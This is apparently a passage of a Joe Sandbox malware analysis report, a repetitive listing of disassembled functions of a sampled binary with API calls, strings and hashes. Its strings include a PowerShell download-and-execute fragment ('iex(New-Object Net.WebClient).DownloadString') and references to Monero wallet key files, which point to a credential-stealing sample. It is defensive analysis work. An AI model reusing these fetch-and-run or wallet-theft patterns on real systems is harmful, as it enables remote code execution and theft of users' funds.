                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 3031569214-898575020
                                    • Opcode ID: 9f7af40ecc143b40097f0d2afcb57f45740752099cef4b08f06860563874cde8
                                    • Instruction ID: 0ee973e9de489af82a2a34cac4fc76ae69d17cdc8d4e1d464e63fce1354805d2
                                    • Opcode Fuzzy Hash: 9f7af40ecc143b40097f0d2afcb57f45740752099cef4b08f06860563874cde8
                                    • Instruction Fuzzy Hash: 01410E71E002889EEB14FBA1CD91BEDB779AF19300F414019E116BA193DF743A4ACF92
                                    APIs
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 000D9F41
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$AllocLocal
                                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                    • API String ID: 4171519190-1096346117
                                    • Opcode ID: c0081338641670d16ce7577d5e02d5bd10ccfab35e00278514c23927bd9f2114
                                    • Instruction ID: f30469853021d3ac63a0f7b56bfce3c58ca0bbe0f57cf5e1d1c237e73aef12dd
                                    • Opcode Fuzzy Hash: c0081338641670d16ce7577d5e02d5bd10ccfab35e00278514c23927bd9f2114
                                    • Instruction Fuzzy Hash: E4613E70A00248EFDB24EFA4DD96BEE7775AF45300F048118F9096F696DF746A05CB62
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E7E37
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000E7E3E
                                    • RegOpenKeyExA.ADVAPI32(80000002,00B6C460,00000000,00020119,?), ref: 000E7E5E
                                    • RegQueryValueExA.ADVAPI32(?,00B7FD00,00000000,00000000,000000FF,000000FF), ref: 000E7E7F
                                    • RegCloseKey.ADVAPI32(?), ref: 000E7E92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: d2a1c9f31166764570169c6b9825c5ffaeba7d319df5ff1e497aa3e08784d0c5
                                    • Instruction ID: b2823698499db78807cc63539ca2cae7f4e7dd604e3ecc55c14cba100ca075d5
                                    • Opcode Fuzzy Hash: d2a1c9f31166764570169c6b9825c5ffaeba7d319df5ff1e497aa3e08784d0c5
                                    • Instruction Fuzzy Hash: 27118CB1A44609EFD715CBD5DC4AFBFBBBCEB08B11F108119F605A7280D77459008BA2
                                    APIs
                                    • StrStrA.SHLWAPI(00B80840,?,?,?,000E140C,?,00B80840,00000000), ref: 000E926C
                                    • lstrcpyn.KERNEL32(0031AB88,00B80840,00B80840,?,000E140C,?,00B80840), ref: 000E9290
                                    • lstrlen.KERNEL32(?,?,000E140C,?,00B80840), ref: 000E92A7
                                    • wsprintfA.USER32 ref: 000E92C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpynlstrlenwsprintf
                                    • String ID: %s%s
                                    • API String ID: 1206339513-3252725368
                                    • Opcode ID: 4d6e9cb4cfa69ae7044f764f49602c39ac6668cbf32c6ca8d140f5f72da3248d
                                    • Instruction ID: e3eba28b43051f3cd3820fd13b03e30809324b1f8727db19e3b99c4b45f4365e
                                    • Opcode Fuzzy Hash: 4d6e9cb4cfa69ae7044f764f49602c39ac6668cbf32c6ca8d140f5f72da3248d
                                    • Instruction Fuzzy Hash: 97015A75501208FFCB06DFECD988EEE3BB9EB48352F10C148F9099B240C630AA40DB91
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000D12B4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000D12BB
                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 000D12D7
                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000D12F5
                                    • RegCloseKey.ADVAPI32(?), ref: 000D12FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: ae1ff951ccce68467aaba8dfb8435b536f1e739173d01f25c9d7b71b69c31ba7
                                    • Instruction ID: 0efd3fe82372044f734c8469b3691dccd0124a7157f17ffbccb3f2ff4cabbad3
                                    • Opcode Fuzzy Hash: ae1ff951ccce68467aaba8dfb8435b536f1e739173d01f25c9d7b71b69c31ba7
                                    • Instruction Fuzzy Hash: D901E1B9A40208BBDB05DFE4DC49FEEBBBCEB4C701F108159FA0597280DA759A018F51
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 000E6663
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 000E6726
                                    • ExitProcess.KERNEL32 ref: 000E6755
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                    • String ID: <
                                    • API String ID: 1148417306-4251816714
                                    • Opcode ID: 425c94e98f34989cb6fa5dcb2541e18359e426f1d3e6d43f4224d81aad0bfd6b
                                    • Instruction ID: 9f2996a3eff2071292ca6a35bda7aed7e3b430539e3f0c33f26756c984eac654
                                    • Opcode Fuzzy Hash: 425c94e98f34989cb6fa5dcb2541e18359e426f1d3e6d43f4224d81aad0bfd6b
                                    • Instruction Fuzzy Hash: B13149B1D01248AEDB15EB91DD82BDEB77CAF48300F408199F21976192DF746B48CF6A
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,000F0E28,00000000,?), ref: 000E882F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000E8836
                                    • wsprintfA.USER32 ref: 000E8850
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: fc0e0a0c833c36e3b7fe477080f3fc9a899a13b4aa71b1c099bafec79d40abe3
                                    • Instruction ID: b64f1c5313212488213109b43bacbda16d4b8a1d2a826f702cd85d226ace6555
                                    • Opcode Fuzzy Hash: fc0e0a0c833c36e3b7fe477080f3fc9a899a13b4aa71b1c099bafec79d40abe3
                                    • Instruction Fuzzy Hash: 8C2130B1A41608AFDB04DFD8DD45FEEBBB8FB4C711F108119F605A7281C779A9018BA1
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,000E951E,00000000), ref: 000E8D5B
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000E8D62
                                    • wsprintfW.USER32 ref: 000E8D78
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesswsprintf
                                    • String ID: %hs
                                    • API String ID: 769748085-2783943728
                                    • Opcode ID: 63e455d4c552ee0428dbaef0dbec0ac34318d4dfdcc837c1217400f2335150b0
                                    • Instruction ID: aae5e6c5c11025f52163a4fa6b48dbcdecd617e6997a53b69744d20207a53c2d
                                    • Opcode Fuzzy Hash: 63e455d4c552ee0428dbaef0dbec0ac34318d4dfdcc837c1217400f2335150b0
                                    • Instruction Fuzzy Hash: 2FE08CB0A41208BBC700DBD4DC0AEA97BBCEB08702F008194FE0987280DA719E009B92
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                      • Part of subcall function 000E8B60: GetSystemTime.KERNEL32(000F0E1A,00B80428,000F05AE,?,?,000D13F9,?,0000001A,000F0E1A,00000000,?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000E8B86
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000DA2E1
                                    • lstrlen.KERNEL32(00000000,00000000), ref: 000DA3FF
                                    • lstrlen.KERNEL32(00000000), ref: 000DA6BC
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                    • DeleteFileA.KERNEL32(00000000), ref: 000DA743
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 11f24e7fd62b694f33636288a844fbd7dca432e985ccf8a3810541bb7c6ad3d1
                                    • Instruction ID: b30633eda24b80494e73bf535dae22a315c3eaf17d3f378caaedfc6f6aaf3ba0
                                    • Opcode Fuzzy Hash: 11f24e7fd62b694f33636288a844fbd7dca432e985ccf8a3810541bb7c6ad3d1
                                    • Instruction Fuzzy Hash: 9EE1E772A101489EDB05EBA5DD92EEE7339AF1D300F518169F516B6093EE307A0DCB62
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                      • Part of subcall function 000E8B60: GetSystemTime.KERNEL32(000F0E1A,00B80428,000F05AE,?,?,000D13F9,?,0000001A,000F0E1A,00000000,?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000E8B86
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000DD481
                                    • lstrlen.KERNEL32(00000000), ref: 000DD698
                                    • lstrlen.KERNEL32(00000000), ref: 000DD6AC
                                    • DeleteFileA.KERNEL32(00000000), ref: 000DD72B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: e76359186d6ad6a6ca58370ad7fed486fbb179f95a1f26040ea67c9726f21a2b
                                    • Instruction ID: fea784c7110249e78199974e6b92125f2868761f94c68e1dea4f1bfade878985
                                    • Opcode Fuzzy Hash: e76359186d6ad6a6ca58370ad7fed486fbb179f95a1f26040ea67c9726f21a2b
                                    • Instruction Fuzzy Hash: ED911C72A101489EDB05EBA1DD92EEE7339AF1D300F518169F516B6093EF347A09CB62
                                    APIs
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                      • Part of subcall function 000E8B60: GetSystemTime.KERNEL32(000F0E1A,00B80428,000F05AE,?,?,000D13F9,?,0000001A,000F0E1A,00000000,?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000E8B86
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000DD801
                                    • lstrlen.KERNEL32(00000000), ref: 000DD99F
                                    • lstrlen.KERNEL32(00000000), ref: 000DD9B3
                                    • DeleteFileA.KERNEL32(00000000), ref: 000DDA32
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                     • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
